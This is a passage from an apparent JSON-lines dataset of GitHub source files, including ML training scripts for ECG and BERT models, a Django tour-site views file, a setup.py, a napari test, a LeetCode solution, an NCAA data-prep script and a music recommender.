dl.set_postfix(loss=loss_log)\n\n if reduce:\n loss_log = loss_ret = np.mean(lst_loss)\n else:\n loss_ret = torch.cat(lst_loss).numpy()\n loss_log = np.mean(loss_ret)\n logits, labels = torch.cat(lst_logits, dim=0), torch.cat(lst_labels, dim=0)\n preds_prob = torch.sigmoid(logits)\n d_log = dict(epoch=self.epoch, step=self.step) if training else dict()\n d_update = {**dict(loss=loss_log), **train_util.get_accuracy(preds_prob, labels)}\n d_log.update({f'eval/{k}': v for k, v in d_update.items()})\n self.log(d_log)\n d_log['eval/loss'] = loss_ret\n if not training:\n self.logger = None\n self.model.loss_reduction = red_ori\n return dict(metrics=d_log, predictions=dict(labels=labels, logits=logits)) if return_predictions else d_log\n\n def log(self, msg: Dict):\n msg_ = train_util.pretty_log_dict(msg, ref=self.train_meta)\n should_log = True\n # eval always logged\n if self.args['log_per_epoch'] and self.model.training and msg['step'] % self.args['steps_per_epoch'] != 0:\n should_log = False\n if self.args['log_to_console'] and should_log:\n self.logger.info(log_dict(msg_))\n if self.logger_fl:\n self.logger_fl.info(log_dict_nc(msg_))\n msg = {k: v for k, v in msg.items() if MyTrainer._keep_in_tb_write(k, v)}\n if self.tb_writer:\n for k, v in msg.items():\n self.tb_writer.add_scalar(tag=k, scalar_value=v, global_step=self.step)\n\n @staticmethod\n def _keep_in_tb_write(k: str, v: Any) -> bool:\n return not any(key in k for key in MyTrainer.tb_ignore_keys) and bool(v)\n\n def _get_lr(self) -> float:\n return self.scheduler.get_last_lr()[0]\n\n def _get_epoch_desc(self) -> str:\n n_ep_str = train_util.pretty_single('epoch', self.epoch, {'#epoch': self.args['num_train_epoch']})\n return f'Epoch {n_ep_str.strip()}'\n\n\ndef get_train_args(args: Dict = None, n_train: int = None) -> Dict:\n default_args = dict(\n num_train_epoch=3,\n train_batch_size=64,\n eval_batch_size=64,\n do_eval=True,\n optimizer='AdamW', # 'Adam' as in ViT doesn't work well, only learns meaningful with real small decay\n learning_rate=3e-4,\n weight_decay=1e-2, # decay of 1e-1 as in ViT is too harsh for our case, maybe due to 4096 batch size in ViT?\n warmup_ratio=0.05,\n schedule='cosine',\n n_sample=None,\n augment_timeout=False,\n patience=8,\n precision=16 if torch.cuda.is_available() else 'bf16',\n log_per_epoch=False, # only epoch-wise evaluation is logged\n log_to_console=True,\n save_every_n_epoch=False, # only save in the end\n save_top_k=-1, # save all models\n tqdm=False\n )\n args_ = default_args\n if args is not None:\n args_.update(args)\n # TODO: gradient accumulation not supported\n # see `get_all_setup` for PL\n args_['steps_per_epoch'] = steps_per_epoch = math.ceil((n_train or int(sys.maxsize)) // args_['train_batch_size'])\n args_['n_step'] = steps_per_epoch * args_['num_train_epoch']\n ca(optimizer=args_['optimizer'], schedule=args_['schedule'])\n return args_\n\n\ndef get_all_setup(\n model_name: str = 'ecg-vit', model_size: str = 'small', train_args: Dict = None,\n ptbxl_type: str = 'denoised', with_pl: bool = False\n) -> Tuple[nn.Module, MyPlTrainer]:\n assert model_name == 'ecg-vit'\n conf = EcgVitConfig.from_defined(f'{model_name}-{model_size}')\n model = EcgVit(config=conf)\n\n trainer_args = dict(model=model)\n if with_pl:\n raise NotImplementedError('PL not updated with TimeOut')\n dummy_train_args = get_train_args(train_args) # kind of ugly\n dnm = 'PTB-XL'\n pad = transform.TimeEndPad(conf.patch_size, pad_kwargs=dict(mode='constant', constant_values=0)) # zero-padding\n stats = config(f'datasets.{dnm}.train-stats.{ptbxl_type}')\n dset_args = dict(type=ptbxl_type, normalize=stats, transform=pad, return_type='pt')\n trainer_args['data_module'] = data_module = PtbxlDataModule(dataset_args=dset_args, train_args=dummy_train_args)\n n_train = len(data_module.train_dataloader())\n trainer_args['train_args'] = get_train_args(train_args, n_train=n_train)\n cls = MyPlTrainer\n else:\n timeout = train_args.get('augment_timeout', False) # TODO: kinda ugly, defined again in `get_train_args`\n args = dict(type=ptbxl_type, n_sample=train_args['n_sample'], std_norm=True, pad=conf.patch_size, timeout=timeout)\n tr, vl, ts = get_ptbxl_dataset(**args)\n # tr, vl, ts = get_ptbxl_splits(n_sample=train_args['n_sample'], dataset_args=dset_args)\n n_train = len(tr)\n trainer_args['train_dataset'], trainer_args['eval_dataset'] = tr, vl\n trainer_args['args'] = get_train_args(train_args, n_train=n_train)\n cls = MyTrainer\n return model, cls(**trainer_args)\n\n\nif __name__ == '__main__':\n from pytorch_lightning.utilities.seed import seed_everything\n # import transformers\n\n from icecream import ic\n\n lw = 1024\n ic.lineWrapWidth = lw\n np.set_printoptions(linewidth=lw)\n torch.set_printoptions(linewidth=lw)\n\n seed_everything(config('random-seed'))\n # transformers.set_seed(config('random-seed'))\n\n def train():\n model_size = 'debug'\n # model_size = 'tiny'\n t = 'original'\n\n n_sample = 64\n # n_sample = 128\n # n_sample = 512\n # bsz = 8\n bsz = 4\n num_train_epoch = 16\n with_pl = False\n\n train_args = dict(\n num_train_epoch=num_train_epoch,\n train_batch_size=bsz,\n eval_batch_size=bsz,\n # learning_rate=1e-3,\n learning_rate=3e-4,\n # weight_decay=1e-4,\n weight_decay=1e-2,\n # warmup_ratio=0.1,\n warmup_ratio=0,\n schedule='constant',\n n_sample=n_sample,\n augment_timeout=True,\n # precision=16 if torch.cuda.is_available() else 32,\n # do_eval=False,\n log_per_epoch=True,\n # log_to_console=False,\n save_every_n_epoch=8,\n save_top_k=2,\n tqdm=True\n )\n model, trainer = get_all_setup(model_size=model_size, train_args=train_args, ptbxl_type=t, with_pl=with_pl)\n trainer.train()\n train()\n # profile_runtime(train)\n\n def fix_check_trained_why_auc_low():\n model_key = 'ecg-vit-base'\n conf = EcgVitConfig.from_defined(model_key)\n model = EcgVit(config=conf)\n model = EcgVitTrainModule(model=model)\n\n checkpoint_path = os.path.join(\n PATH_BASE, DIR_PROJ, DIR_MDL,\n '2022-04-14_14-59-52', 'checkpoints', 'checkpoint-epochepoch=08, eval-loss=eval', 'loss=0.13.ckpt'\n )\n ckpt = torch.load(checkpoint_path, map_location='cpu')\n # ic(type(ckpt), ckpt.keys())\n # ic(ckpt['state_dict'].keys())\n model.load_state_dict(ckpt['state_dict'], strict=True) # Need the pl wrapper cos that's how the model is saved\n model.eval()\n # ic(model)\n\n t = 'original'\n dnm = 'PTB-XL'\n pad = transform.TimeEndPad(conf.patch_size, pad_kwargs=dict(mode='constant', constant_values=0)) # zero-padding\n stats = config(f'datasets.{dnm}.train-stats.{t}')\n dset_args = dict(type=t, normalize=stats, transform=pad, return_type='pt')\n tr, vl, ts = get_ptbxl_splits(n_sample=1024, dataset_args=dset_args)\n # dl = DataLoader(tr, batch_size=4)\n dl = DataLoader(vl, batch_size=4)\n for inputs in dl:\n sample_values = inputs['sample_values']\n ic(sample_values.shape, sample_values[:, 0, :20])\n with torch.no_grad():\n outputs = model(**inputs)\n # ic(outputs)\n loss, logits, labels = outputs.loss, outputs.logits, inputs['labels']\n ic(logits)\n ic(train_util.get_accuracy(torch.sigmoid(logits), labels, return_auc=True))\n exit(1)\n # fix_check_trained_why_auc_low()\n\n def fix_check_why_logits_all_same():\n conf = EcgVitConfig.from_defined('ecg-vit-debug')\n conf.patch_size = 32 # half of the defined\n model = EcgVit(config=conf)\n\n t = 'original'\n dnm = 'PTB-XL'\n pad = transform.TimeEndPad(conf.patch_size, pad_kwargs=dict(mode='constant', constant_values=0)) # zero-padding\n stats = config(f'datasets.{dnm}.train-stats.{t}')\n dset_args = dict(type=t, normalize=stats, transform=pad, return_type='pt')\n n = 128\n bsz = 32\n tr, vl, ts = get_ptbxl_splits(n_sample=n, dataset_args=dset_args)\n dl = DataLoader(vl, batch_size=bsz, shuffle=True)\n\n # lr = 3e-4\n lr = 1e-3\n optimizer = torch.optim.AdamW(model.parameters(), lr=lr, weight_decay=0)\n for n_ep in range(32):\n model.train() # cos at the end of each eval, evaluate\n for inputs in dl:\n # inputs['sample_values'] = inputs['sample_values'][:, :, :80]\n optimizer.zero_grad()\n\n sample_values, labels = inputs['sample_values'], inputs['labels']\n outputs = model(**inputs)\n loss, logits = outputs.loss, outputs.logits.detach()\n\n msk_2_class = torch.any(~labels.eq(labels[0]), dim=0)\n preds_prob = torch.sigmoid(logits)\n bin_preds = preds_prob > 0.5\n # matched = bin_preds.eq(labels)\n # acc = matched.sum().item() / matched.numel()\n # ic(sample_values[:, 0, :4], labels, logits, acc)\n d_metric = train_util.get_accuracy(preds_prob, labels)\n acc, auc = d_metric['binary_accuracy'], d_metric['macro_auc']\n ic(\n preds_prob[:, msk_2_class], bin_preds[:, msk_2_class], labels[:, msk_2_class], acc, auc,\n bin_preds.sum().item(),\n # (~matched).nonzero(),\n )\n\n loss.backward()\n nn.utils.clip_grad_norm_(model.parameters(), max_norm=1.0, error_if_nonfinite=True)\n optimizer.step()\n # scheduler.step()\n # fix_check_why_logits_all_same()\n # profile_runtime(fix_check_why_logits_all_same)\n","repo_name":"StefanHeng/ECG-Representation-Learning","sub_path":"ecg_transformer/models/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":28341,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"19"} +{"seq_id":"7111666266","text":"from threading import Thread\n\na = 999\n\n\ndef task():\n global a\n a = 666\n print('线 %s' % a)\n\n\nif __name__ == '__main__':\n t = Thread(target=task)\n t.start()\n t.join()\n print('主 %s' % a)\n\n\"\"\" ===>> \n线 666\n主 666\n\"\"\"","repo_name":"wangwenjei/python-demo","sub_path":"Python笔记/10.并发编程/02.线程/03.模拟同一进程下多线程间数据共享.py","file_name":"03.模拟同一进程下多线程间数据共享.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"4036463813","text":"import os\n# read the contents of your README file\nfrom pathlib import Path\n\nfrom setuptools import setup\n\nthis_directory = Path(__file__).parent\nlong_description = (this_directory / \"README.md\").read_text()\n\nif os.path.exists(\"version.txt\"):\n VERSION = (this_directory / \"version.txt\").read_text().strip()\nelse:\n VERSION = \"0.0.0.dev0\"\n\nREQUIREMENTS = [\n \"pydantic >= 1.9.2, <2.0.0\",\n \"requests >=2.28.0, <3.0.0\",\n \"Pillow >=9.1.1, <11.0.0\"\n]\n\nDOCS_REQUIREMENTS = [\n \"mkdocs >=1.4.0, <2.0.0\",\n \"mkdocs-material >=8.0.0, <9.0.0\",\n \"mkdocstrings-python >=0.7.0, <1.0.0\",\n \"griffe >=0.25.2, <1.0.0\",\n \"mkdocs-awesome-pages-plugin >=2.8.0, <3.0.0\"\n]\n\nDEV_REQUIREMENTS = [\n \"autopep8 >=1.6.0, <2.0.0\",\n \"isort >=5.10.1, <6.0.0\",\n \"flake8 >=4.0.1, <5.0.0\",\n \"flake8-docstrings >=1.6.0, <2.0.0\",\n \"flake8-isort >=4.1.1, <5.0.0\",\n \"tox >=3.25.0, <4.0.0\",\n \"Pillow >=9.1.1, <11.0.0\",\n \"deepdiff >=6.2.2, <7.0.0\",\n \"datamodel-code-generator >=0.17.1, <1.0.0\"\n]\n\n# Setting up\nsetup(\n name=\"iiif-prezi3\",\n version=VERSION,\n author=\"IIIF Prezi3 Team\",\n description=\"IIIF Presentation v3 API implementation\",\n long_description=long_description,\n long_description_content_type='text/markdown',\n packages=['iiif_prezi3', 'iiif_prezi3.helpers', 'iiif_prezi3.extensions', 'iiif_prezi3.config'],\n package_data={\n 'iiif_prezi3': ['config/extensions.json']\n },\n classifiers=[\"Development Status :: 5 - Production/Stable\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Operating System :: OS Independent\", # is this true? know Linux & OS X ok\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Programming Language :: Python :: 3.10\",\n \"Programming Language :: Python :: 3.11\",\n \"Topic :: Internet :: WWW/HTTP\",\n \"Topic :: Multimedia :: Graphics :: Graphics Conversion\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n \"Environment :: Web Environment\"],\n python_requires='>=3',\n url='https://github.com/iiif-prezi/iiif-prezi3',\n license='Apache License, Version 2.0',\n install_requires=REQUIREMENTS,\n extras_require={\n \"docs\": DOCS_REQUIREMENTS,\n \"dev\": DEV_REQUIREMENTS,\n },\n)\n","repo_name":"iiif-prezi/iiif-prezi3","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"19"} +{"seq_id":"12280848441","text":"from django.shortcuts import render, redirect\nfrom .forms import ContactusForm\nfrom .models import Faq, FaqServices, HappyCutomer, HeroImage, Newsletter\nfrom tour.models import Tour , Promotion\nfrom accounts.models import Contact\nfrom django.contrib import messages\nfrom django.core.mail import send_mail\nfrom outbounds.models import Otour\n\nfrom django.core.paginator import EmptyPage, PageNotAnInteger, Paginator\n\nfrom django.db.models import Q\nfrom tour.models import ReviewRating\nfrom tour.forms import ReviewForm\nfrom django.core.mail import EmailMessage\nfrom django.template.loader import render_to_string\nfrom django.conf import settings\nimport time\nimport requests\nfrom bs4 import BeautifulSoup\nimport logging\nfrom random import choice\n\nfrom selenium import webdriver\n# Create your views here.\n\n\ndef front(request):\n hero_images = HeroImage.objects.all()\n random_hero_image = choice(hero_images) if hero_images else None\n \n tours = Tour.objects.all()\n discount = Promotion.objects.all\n total_tours = tours.count()\n happy_customer = HappyCutomer.objects.all()\n\n\n context = {'tours': tours , 'discount': discount, 'total_tours':total_tours, 'happy_customer':happy_customer, 'random_hero_image': random_hero_image}\n return render(request, \"frontend/home.html\", context)\n\n\n\ndef gallery(request):\n \n context = {}\n return render(request, 'frontend/gallery.html' , context)\n \n \n \ndef contactUs(request):\n\n if request.method==\"POST\":\n form=ContactusForm(request.POST)\n if form.is_valid():\n messages.success(request, 'Message sent successfully!')\n form.save()\n time.sleep(3)\n else:\n messages.info(request, 'Something Wrong! Please try again')\n \n \n form=ContactusForm()\n\n context = {'form': form}\n return render(request, \"frontend/contact.html\", context)\n\n\n\n\ndef aboutUs(request):\n\n \n context = {}\n return render(request, \"frontend/about.html\", context)\n\n\n\n\n\ndef faq(request):\n faq_services = FaqServices.objects.all()\n faqs = Faq.objects.all()\n context = {'faqs':faqs, 'faq_services':faq_services}\n return render(request, \"frontend/faqs.html\", context)\n\ndef privacyPage(request):\n \n context = {}\n return render(request, \"frontend/privacy-policy.html\", context)\n \n\n\n\n\n\ndef successPage(request):\n\n\n context = {}\n return render(request, 'frontend/success_page.html', context)\n\n\ndef handle404(request, exception):\n \n return render(request,'frontend/error.html', status=404)\n\ndef newsletter(request):\n if request.method == \"POST\":\n email = request.POST['email_newsletter_2']\n \n if Newsletter.objects.filter(email=email).exists() :\n messages.info(request, \"Email already registered\")\n else :\n newsletter = Newsletter(email=email)\n newsletter.save()\n messages.success(request, \"Thank you, Your Email has been successfully saved\")\n \n # send email to cutomer \n html_template = 'frontend/newsletter.html'\n subject = 'Thank you for subscribing!'\n html_message = render_to_string(html_template, {\n 'user': request.user,\n \n })\n recipient_list = [email]\n email_from = settings.EMAIL_HOST_USER\n message = EmailMessage(subject, html_message, email_from, recipient_list)\n message.content_subtype = \"html\"\n message.send()\n return redirect('home')\n\ndef cate_link(request):\n links = Tour.objects.all()\n return dict(links = links)\n\ndef error_404(request, exception):\n\n\n context = {}\n return render(request, 'frontend/404.html', context)\n\n\n\n\n\ndef search(request):\n if 'q' in request.GET:\n q = request.GET['q']\n tours= Tour.objects.order_by('-date_created').filter(Q(description__icontains=q) | Q(name__icontains=q))\n otours= Otour.objects.order_by('-date_created').filter(Q(description__icontains=q) | Q(name__icontains=q))\n \n \n else:\n tours=Tour.objects.all()\n otours=Otour.objects.all()\n context = {'tours':tours, 'otours':otours}\n return render(request, 'frontend/search.html', context)\n\n\n\nlogger = logging.getLogger(__name__)\n\ndef tripadvisor_reviews(request):\n options = webdriver.ChromeOptions()\n options.add_argument('headless')\n options.add_argument('user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36')\n driver = webdriver.Chrome(options=options)\n\n url = 'https://www.tripadvisor.com/Attraction_Review-g295424-d1416619-Reviews-Arabian_Nights_Tours_LLC-Dubai_Emirate_of_Dubai.html'\n driver.get(url)\n time.sleep(5)\n\n driver.execute_script('window.scrollTo(0, document.body.scrollHeight);')\n time.sleep(5)\n\n soup = BeautifulSoup(driver.page_source, 'lxml')\n reviews = []\n for review in soup.select('.review-container')[:10]:\n title = review.select_one('span.noQuotes').text\n rating = review.select_one('span.ui_bubble_rating')['class'][1].split('_')[-1]\n text = review.select_one('p.partial_entry').text\n reviews.append({\n 'title': title,\n 'rating': rating,\n 'text': text,\n })\n\n driver.quit()\n\n logger.debug(reviews)\n context = {'reviews': reviews}\n return render(request, 'frontend/tripadvisor_reviews.html', context)\n","repo_name":"qamar62/akt_2023","sub_path":"frontend/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73039969322","text":"import numpy as np\nimport pytest\n\nfrom napari._qt.widgets.qt_range_slider_popup import QRangeSliderPopup\n\ninitial = np.array([100, 400])\nrange_ = np.array([0, 500])\n\n\n@pytest.fixture\ndef popup(qtbot):\n popup = QRangeSliderPopup(\n horizontal=True,\n precision=2,\n initial_values=initial,\n data_range=range_,\n step_size=1,\n )\n qtbot.addWidget(popup)\n return popup\n\n\ndef test_range_slider_popup_labels(popup):\n \"\"\"make sure labels are correct\"\"\"\n assert float(popup.curmin_label.text()) == initial[0]\n assert float(popup.curmax_label.text()) == initial[1]\n assert np.all(popup.slider.range() == range_)\n\n\ndef test_range_slider_changes_labels(popup):\n \"\"\"make sure setting the slider updates the labels\"\"\"\n popup.slider.setValues((10, 20))\n assert float(popup.curmin_label.text()) == 10\n assert float(popup.curmax_label.text()) == 20\n\n\ndef test_labels_change_range_slider(popup):\n \"\"\"make sure setting the labels updates the slider\"\"\"\n popup.slider.setValues((10, 20))\n\n popup.curmin_label.setText('100')\n popup.curmax_label.setText('300')\n popup.curmin_label.editingFinished.emit()\n popup.curmax_label.editingFinished.emit()\n assert np.all(popup.slider.values() == (100, 300))\n","repo_name":"zzalscv2/napari","sub_path":"napari/_qt/widgets/_tests/test_qt_range_slider_popup.py","file_name":"test_qt_range_slider_popup.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"13509901370","text":"#\n# @lc app=leetcode.cn id=684 lang=python3\n#\n# [684] 冗余连接\n#\n\n# @lc code=start\nclass Solution:\n def findRedundantConnection(self, edges: List[List[int]]) -> List[int]:\n n = len(edges)\n fa = [i for i in range(n + 1)]\n\n def find(x: int) -> int:\n if x != fa[x]: fa[x] = find(fa[x])\n return fa[x]\n\n for a, b in edges:\n if find(a) != find(b):\n fa[find(a)] = find(b)\n else:\n return [a, b]\n\n return [0, 0]\n \n# @lc code=end\n\n","repo_name":"ZJH-hhh/something","sub_path":"力扣/.leetcode/684.冗余连接.py","file_name":"684.冗余连接.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"24259211308","text":"import argparse\nimport collections\nimport data_loader.data_loaders as module_data\nimport data_loader.processor as module_processor\nfrom parse_config import ConfigParser\nimport model.model as module_arch\nfrom pytorch_pretrained_bert.modeling import BertConfig\nfrom agent import Agent\n\n\n# ~/Projects/PycharmProjects/DeepLearning/NLP/Bert/BertESIM\n\ndef train(config):\n logger = config.get_logger('train')\n\n # setup data_loader instances\n processor = config.initialize(\n 'processor', module_processor, logger, config)\n\n data_loader = config.initialize(\n 'data_loader',\n module_data,\n processor.data_dir,\n mode=\"train\",\n debug=config.debug_mode)\n test_data_loader = config.initialize(\n 'data_loader',\n module_data,\n processor.data_dir,\n mode=\"test\",\n debug=config.debug_mode)\n\n if config.all:\n valid_data_loader = test_data_loader\n else:\n valid_data_loader = data_loader.split_validation()\n\n # build model architecture, then print to console\n if config.bert_config_path:\n bert_config = BertConfig(config.bert_config_path)\n model = config.initialize(\n 'arch',\n module_arch,\n config=bert_config,\n num_labels=processor.nums_label())\n else:\n model = config.initialize_bert_model(\n 'arch', module_arch, num_labels=processor.nums_label())\n\n logger.info(model)\n agent = Agent(model,\n config=config,\n data_loader=data_loader,\n valid_data_loader=valid_data_loader,\n test_data_loader=test_data_loader)\n\n agent.train()\n return agent.test()\n\n\nif __name__ == '__main__':\n args = argparse.ArgumentParser(description='PyTorch Template')\n args.add_argument('-c', '--config', default=\"ATEC_BERT/config.json\", type=str,\n help='config file path (default: None)')\n args.add_argument('-r', '--resume', default=None, type=str,\n help='path to latest checkpoint (default: None)')\n args.add_argument('-d', '--device', default=None, type=str,\n help='indices of GPUs to enable (default: all)')\n args.add_argument('-a', '--all', default=False, type=bool,\n help='all for training, test as validation')\n args.add_argument('-debug', '--debug', default=False, type=bool,\n help='debug')\n args.add_argument('-reset', '--reset', default=False, type=bool,\n help='debug')\n\n # custom cli options to modify configuration from default values given in\n # json file.\n CustomArgs = collections.namedtuple('CustomArgs', 'flags type target')\n options = [\n CustomArgs(['--lr', '--learning_rate'], type=float,\n target=('optimizer', 'args', 'lr')),\n CustomArgs(['--bs', '--batch_size'], type=int,\n target=('data_loader', 'args', 'batch_size')),\n CustomArgs(['--ep', '--epoch'], type=int, target=('trainer', 'epochs'))\n ]\n\n config = ConfigParser(args, options)\n # config = MockConfigParser()\n train(config)\n","repo_name":"MrXJC/pytorch-bert-template","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3158,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"19"} +{"seq_id":"19660744988","text":"## Import library for data handling\nimport pandas as pd\n\n## Read in two data frames \n## matchups - all of the matchup data, so we know which team played which and who won\n## fullData - the data for each team and their aggregate statistics\nmatchups = pd.read_csv('matchups.csv')\nfullData = pd.read_csv('fullData.csv')\n\n## Some dataframe handling\nmatchups = matchups.dropna()\nmatchups = matchups.reset_index()\n\n## Define a function to retrieve a team's stats based on the year and team name\ndef getTeamStats(team, year): \n newDF = fullData[((fullData['Year'] == year) & (fullData['Team'] == team))]\n for index, row in newDF.iterrows():\n return list(row)\n\n## Test of the function\nprint(getTeamStats('iona', 2019))\n\n\n# newCols = ['RPI', 'Win%', 'CGWin%', 'SOS', 'Last 10', 'Margin', 'OffE', 'AdjO', 'DefE', 'AdjD', 'EffM', 'AdjEM', 'PF', 'PA', 'PFAM', 'TrueS%', 'OpTS%', 'TS%M', 'FG%', 'OpFG%', 'FG%M', '3P%', 'FT%', 'RB%', 'ST/Pos', 'TO/Pos', 'OpTO/Pos', 'TOM', 'BL%', 'PF/Pos']\n# statList = ['effective-field-goal-pct', 'ftm-per-100-possessions', 'offensive-rebounding-pct', 'defensive-rebounding-pct', 'assists-per-fgm', 'effective-possession-ratio']\n# columnsToUse = ['Seed', 'Year', 'Team'] + statList\n# allCols = columnsToUse + newCols\n# allCols = allCols + allCols\n\n# regressionData = pd.DataFrame(columns = allCols)\n\n## Generating an empty list for collection purposes \nregressionData = []\n\n## Declaring variables outside of the loop to track progress of the loop\nfailureTotal = 0\nsuccessTotal = 0\ni = 0\n\n## Using the csv of teams and their stats (matchups and fullData) to produce data that is usable for a regression/other ML algorithm \n## the csv will have winning team and the losing team on the same line, with the result as its own column\n## For each row in matchups\nfor index, row in matchups.iterrows():\n ## Because of the way the data is formatted - every third row we are ready to read in a new matchup\n if i % 3 == 0: \n \n ## The first team is always the winner, so we grab that first\n year = int(row['Year'])\n winner = row['Team'].strip()\n winnerInfo = getTeamStats(winner, year)\n\n ## The next row will be the losing team\n nextRow = matchups.iloc[index + 1]\n\n loser = nextRow['Team'].strip()\n loserInfo = getTeamStats(loser, year) \n\n # Combining the data into one row and append it to our list of matchups\n try:\n totalData = winnerInfo + loserInfo \n regressionData.append(totalData)\n successTotal += 1\n except: \n failureTotal += 1\n print('failure', i, winner, loser, year)\n\n i += 1\n\n## Report the accuracy of this process - there may be some edge case failures\nprint(round(failureTotal / (failureTotal + successTotal), 4) * 100, '%')\n\n## Transform list of matchups into a dataframe, write it to a csv\nregressionDF = pd.DataFrame.from_records(regressionData)\nregressionDF.to_csv('regressionData.csv')\n\n\n## NOTE FOR THE END TO END PROCESS: \n## regressionData gets changed and manually cleaned to turn into regressionUseData \n\n\n","repo_name":"aks5bx/NCAA_Model_Comparisons","sub_path":"dataPrep.py","file_name":"dataPrep.py","file_ext":"py","file_size_in_byte":3112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"579805645","text":"from functions.preprocess import preprocess_data, preprocess_data_by_genres, preprocess_data_by_years\r\nfrom functions.visualize import visualize_songs\r\nfrom functions.clustering_genres import clustering_genre_projection\r\nfrom functions.clustering_music import clustering_music_projection\r\nfrom spotify.recommendations import recommend_id, recommend_music\r\n\r\nmusic_name = 'Ariana Grande - 7 rings'\r\n\r\ndata = preprocess_data('data/all_data.csv')\r\ndata_by_genres = preprocess_data_by_genres('data/data_by_genres.csv')\r\ndata_by_years = preprocess_data_by_years('data/data_by_years.csv')\r\n\r\nprojection, components, var_exp, projection_shape= clustering_genre_projection(data_by_genres)\r\nprojection_v2, components_v2, var_exp_v2, projection_shape_v2 = clustering_music_projection(data)\r\n\r\ndef analytics():\r\n print(f\"\\nGenre Data: \\nComponents = {components} \\nTotal explained variance = {round(var_exp * 100,3)}%\")\r\n print(f\"\\nMusic Data: \\nComponents = {components_v2} \\nTotal explained variance = {round(var_exp_v2 * 100,3)}% \\n\")\r\n\r\nif __name__ == \"__main__\":\r\n analytics()\r\n playlst_id = recommend_music(music_name, projection_v2, data)['id']\r\n name, url = recommend_id(playlst_id)\r\n visualize_songs(name, url) \r\n\r\n","repo_name":"christianduhp/music-recommendation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"15931342528","text":"# Handy for debugging setup.py\n\"\"\"Utilities creating reusable, DRY, setup.py installation scripts\n\n Typical usage in setup.py:\n >>> global_env, local_env = {}, {}\n >>> execfile(join('pug', 'setup_util.py'), global_env, local_env)\n >>> get_variable = local_env['get_variable']\n\"\"\"\nimport os\n\ndef setup(*args, **kwargs):\n print('setup() args = {0}'.format(args))\n print('setup() kwargs = {0}'.format(kwargs))\n\n\ndef get_variable(relpath, keyword='__version__'):\n \"\"\"Read __version__ or other properties from a python file without importing it \n \n from gist.github.com/technonik/406623 but with added keyward kwarg \"\"\"\n for line in open(os.path.join(os.path.dirname(__file__), relpath), encoding='cp437'):\n if keyword in line:\n if '\"' in line:\n return line.split('\"')[1]\n elif \"'\" in line:\n return line.split(\"'\")[1]","repo_name":"hobson/pug","sub_path":"pug/setup_util.py","file_name":"setup_util.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"19"} +{"seq_id":"36929329202","text":"import sys\nsys.path.append('D:\\\\git\\\\RDES')\nimport RDES as rd\nimport argparse\n\ndef main():\n path=parse_arguments().path\n text=rd.read_txt(path)\n print(text)\n s=rd.chr_to_bin(text)\n x10=int(rd.gpsc(rd.min_key),2)\n x20=1\n a=7\n b=13\n res=algoritm(s, x10, x20, a, b, 'key.txt')\n \ndef algoritm(text,x10,x20,a,b, path):\n j=0\n txt_file = open(path, \"w\")\n txt_file.write(str(x10)+\"\\n\")\n txt_file.write(str(x20)+\"\\n\")\n txt_file.write(str(a)+\"\\n\")\n txt_file.write(str(b)+\"\\n\")\n txt_file.close()\n result_text=''\n while j<(len(text)/64):\n text64=text[j*64:64*(j+1)]\n i=0\n tmp='{0:b}'.format(x10)\n while len(tmp)<64:\n tmp='0'+tmp\n res64=''\n while i<64:\n if text64[i]==tmp[i]:\n res64+='0'\n else:\n res64+='1'\n i+=1\n result_text+=res64\n x10=x10*a+x20*b\n j+=1\n rd.write_txt(result_text, 'res.txt')\n return(result_text)\n\ndef parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('path', type=str)\n args = parser.parse_args()\n return args\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"Gajuli/kursach","sub_path":"gamma.py","file_name":"gamma.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"27259099306","text":"import pandas as pd \nimport matplotlib as mlp\nimport matplotlib.pyplot as plt\nimport matplotlib.font_manager as fm\nimport os\n\nmlp.rcParams['axes.unicode_minus'] = False\npath = 'C:\\\\Users\\lane\\Anaconda3\\Lib\\site-packages\\matplotlib\\mpl-data\\fonts\\ttf\\batang.ttc'\nfontprop = fm.FontProperties(fname=path, size=18)\n\nplt.rcParams[\"font.family\"] = 'batang'\nplt.rcParams[\"font.size\"] = 20\nplt.rcParams[\"figure.figsize\"] = (14,4)\n\nloc = 'C:\\\\Users\\\\lane\\\\Desktop\\\\학위논문\\\\graph\\\\Original_epoch'\npath = os.listdir(loc)\naccuracy = []\n\nfor i in range(len(path)):\n path2_name = '%s%s%s' % (loc,'\\\\',path[i])\n path2 = os.listdir(path2_name)\n for j in range(len(path2)):\n path3 = '%s%s%s' % (path2_name,'\\\\',path2[j])\n CSV = pd.read_csv(path3)\n CSV_accuracy = CSV['Accuracy']\n 